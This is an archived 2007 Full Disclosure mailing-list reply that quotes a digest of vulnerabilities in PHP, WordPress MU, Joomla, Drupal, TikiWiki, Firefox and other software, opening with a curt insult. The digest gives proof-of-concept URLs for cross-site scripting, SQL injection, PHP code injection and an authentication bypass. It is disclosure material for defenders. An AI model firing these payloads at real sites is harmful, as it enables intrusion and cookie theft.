|
Full Disclosure
mailing list archives
Re: Vulnerabilities digest
From: <full-disclosure () hushmail com>
Date: Wed, 10 Oct 2007 15:01:09 -0400
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
SHUT UP VLADIS
On Wed, 10 Oct 2007 14:19:25 -0400 3APA3A <3APA3A () SECURITY NNOV RU>
wrote:
Dear bugtraq () securityfocus com,
Vulnerabilities reported by different Russian speaking
authors to
http://securityvulns.ru
1. Elekt(Antichat.ru) reports protection bypass vulnerability in
PHP 4
and 5.
disable_functions feature can be bypassed by using functions
alias. A
list of aliases is given in http://php.net/aliases/. For
example,
ini_alter() may be used instead of ini_set() and vice versa.
SecurityVulns issue: http://securityvulns.com/news/PHP/alias-
pb.html
Original message (in Russian):
http://securityvulns.ru/Sdocument67.html
2. MustLive reports Crossite-Cripting vulnerability in
WordPress
MultiUser 1.0
XSS is possible via Username form field.
Additional information (in Ukranian):
http://websecurity.com.ua/1269/
Original message (in Russian):
http://securityvulns.ru/Rdocument875.html
3. durito [NGH Group] reports multiple SQL injections in ActiveKB
1.5
Example:
http://www.example.com/activekb/index.php?ToDo=browse&catId=[SQL]
http://www.example.com/activekb/admin/index.php?ToDo=hideQuestion&q
uestId=[SQL]
Original message (in Russian):
http://securityvulns.ru/Rdocument901.html
4. MustLive reports Cross-Site Scripting vulnerability in Joomla!
<= 1.0.13
An example of vulnerability is
http://site/index.php?option=com_search&searchword=';alert('XSS')//
Additional information (in Ukranian):
http://websecurity.com.ua/1203/
Original message (in Russian):
http://securityvulns.ru/Rdocument919.html
5. durito [NGH Group] reports crossite-scripting
vulnerability in
ActiveKB NX 2.5.4
Example: http://www.example.com/activekb/ActiveKB/?page=[XXS]
Original message (in Russian):
http://securityvulns.ru/Rdocument956.html
6. "noname indexed" reports vulnerability in UMI CMS (http://uni-
cms.ru)
Vulnerability example:
http://example.com/search/search_do/?search_string=%22%20onmouseove
r=%22javacript:alert();
Original message (in Russian):
http://securityvulns.ru/Rdocument957.html
7. MustLive reports cross-site scripting vulnerability in Nucleus.
Example: http://site/index.php?blogid=1&archive=2007-01-
01%3Cscript%3Ealert(document.cookie)%3C/script%3E
Additional information (in Ukranian):
http://websecurity.com.ua/1347/
Original message (in Russian):
http://securityvulns.ru/Sdocument3.html
8. durito [NGH Group] reports
8.1 multiple SQL injections in Stride v1.0 Content Management
System,
Merchant, Courses. Examples:
Content Management System
http://www.example.com/main.php?p=[SQL]
Merchant
http://www.example.com/shop.php?cmd=sto&id=[SQL]
Courses
http://www.example.com/detail.php?course=[SQL]
http://www.example.com/detail.php?provider=[SQL]
8.2 Information leak (FTP access account) with MyFTPUploader
within
same applications. Example:
http://www.example.com/include/imageupload.js
contains
document.writeln('<param name="uploadDirectory"
value="/public_html/dbimages/process">');
document.writeln('<param name="successURL"
value="admin_imagemulti.php?action=process">');
document.writeln('<param name="host" value="www.target.com">');
document.writeln('<param name="userName" value="target">');
document.writeln('<param name="password" value="target">');
8.3 Default administrator's password for same applications.
Original message (in Russian):
http://securityvulns.ru/Sdocument4.html
9. MustLive reports multiple crossite scripting
vulnerabilities in
Site-Up <= 2.64
Via "search" and "search mask" fields of
http://site/siteuprus/index.cgi:
Additional information (in Ukranian):
http://websecurity.com.ua/1210/
Original message: (in Russian):
http://securityvulns.ru/Sdocument12.html
10. MustLive reports crossite scripting in Google Search
Appliance.
Example:
http://site/search?ie=%22%3E%3Cscript%3Ealert(document.cookie)%3C/s
cript%3E&site=x&output=xml_no_dtd'&client=x&proxystylesheet=x'
Additional information (in Ukranian):
http://websecurity.com.ua/1368/
Original message (in Russian):
http://securityvulns.ru/Sdocument32.html
10. MustLive reports crossite scripting in PRO-search
Example:
http://site/?q=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3
E
Additional information (in Ukranian):
http://websecurity.com.ua/1224/
Original message (in Russian):
http://securityvulns.ru/Sdocument68.html
10. MustLive reports multiple vulnerabilities in Urchin Web
Analytics
5.7.03.
In addition to re-discovered XSS vulnerability, there is
also
authentication bypass (access without username/password).
Example:
http://site:10000/report.cgi?profile=x&rid=42&prefs=x&n=10&vid=1301
&bd=20070703&ed=20070703&dt=4>ype=5
Additional information (in Ukranian):
http://websecurity.com.ua/1283/
Original message: (in Russian):
http://securityvulns.ru/Sdocument90.html
11. MustLive reports crossite scripting vulnerability in Mozilla
Firefox
<= 2.0 with gopher: protocol URL if UTF-7 if page content is
displayed as
UTF-7. Examples:
For Firefox before 2.0:
gopher:///1+ADw-SCRIPT+AD4-alert('XSS')+ADw-/SCRIPT+AD4-
gopher:///1Turn%20on%20UTF-7%20to%20view%20this%20message%20+ADw-
SCRIPT+AD4-alert('XSS')+ADw-/SCRIPT+AD4-
For Firefox 2.0:
gopher:///1+ADw-SCRIPT+AD4-alert(/XSS/)+ADw-/SCRIPT+AD4-
gopher:///1Turn%20on%20UTF-7%20to%20view%20this%20message%20+ADw-
SCRIPT+AD4-alert(/XSS/)+ADw-/SCRIPT+AD4-
According to author, it's possible to execute script in both
local zone
and context of gopher site.
12. ShAnKaR reports PHP Zend Hash vulnerability exploitation
vector
with Drupal <= 5.2.
Example:
http://www.example.com/drupal/?_menu[callbacks][1][callback]=drupal
_eval&_menu[items][][type]=-1&-312030023=1&q=1/<?phpinfo();
Original message (in Russian):
http://securityvulns.ru/Sdocument137.html
13. ShAnKaR reports PHP injection vulnerability in TikiWiki 1.9.8.
Example: http://www.example.com/tikiwiki/tiki-
graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png
&title=
Original message (in Russian):
http://securityvulns.ru/Sdocument162.html
Also, multiple vulnerabilities were reported in English by
:: iNs @ uNkn0wn.eu :: http://securityvulns.com/source26994.html
and
r0t: http://securityvulns.com/source12948.html
--
http://securityvulns.com/
/\_/\
{ , . } |\
+--oQQo->{ ^ }<-----+ \
| ZARAZA U 3APA3A } You know my name - look up my number (The
Beatles)
+-------------o66o--+ /
|/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Charset: UTF8
Version: Hush 2.5
wpwEAQECAAYFAkcNIXUACgkQ+dWaEhErNvSx3AP8CerSijQ2isO5LY36fadxrILLiQok
XJi0X3Sa+AooEb2m9if9CdMhel7A3a4yyBMqVOWfWF1hbxccpeNS0Fi1OKXNoYwMpRIe
PKST+uLl+dMxMKicDIMkRo4xyVc76+X/uq5b5IAk4vrR27CX/4yFHBboDK3cDptsQ9C6
6LtRXXA=
=tavm
-----END PGP SIGNATURE-----
--
Discount Online Trading - Click Now!
http://tagline.hushmail.com/fc/Ioyw6h4dPYvcpmGb9tTkWB5jLIFiSCd0JeGTaxcz8UO3dwnuZGxWsg/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
 By Date 
By Thread
Current thread:
- Vulnerabilities digest 3APA3A (Oct 10)
- <Possible follow-ups>
- Re: Vulnerabilities digest full-disclosure (Oct 10)
| 
Intro
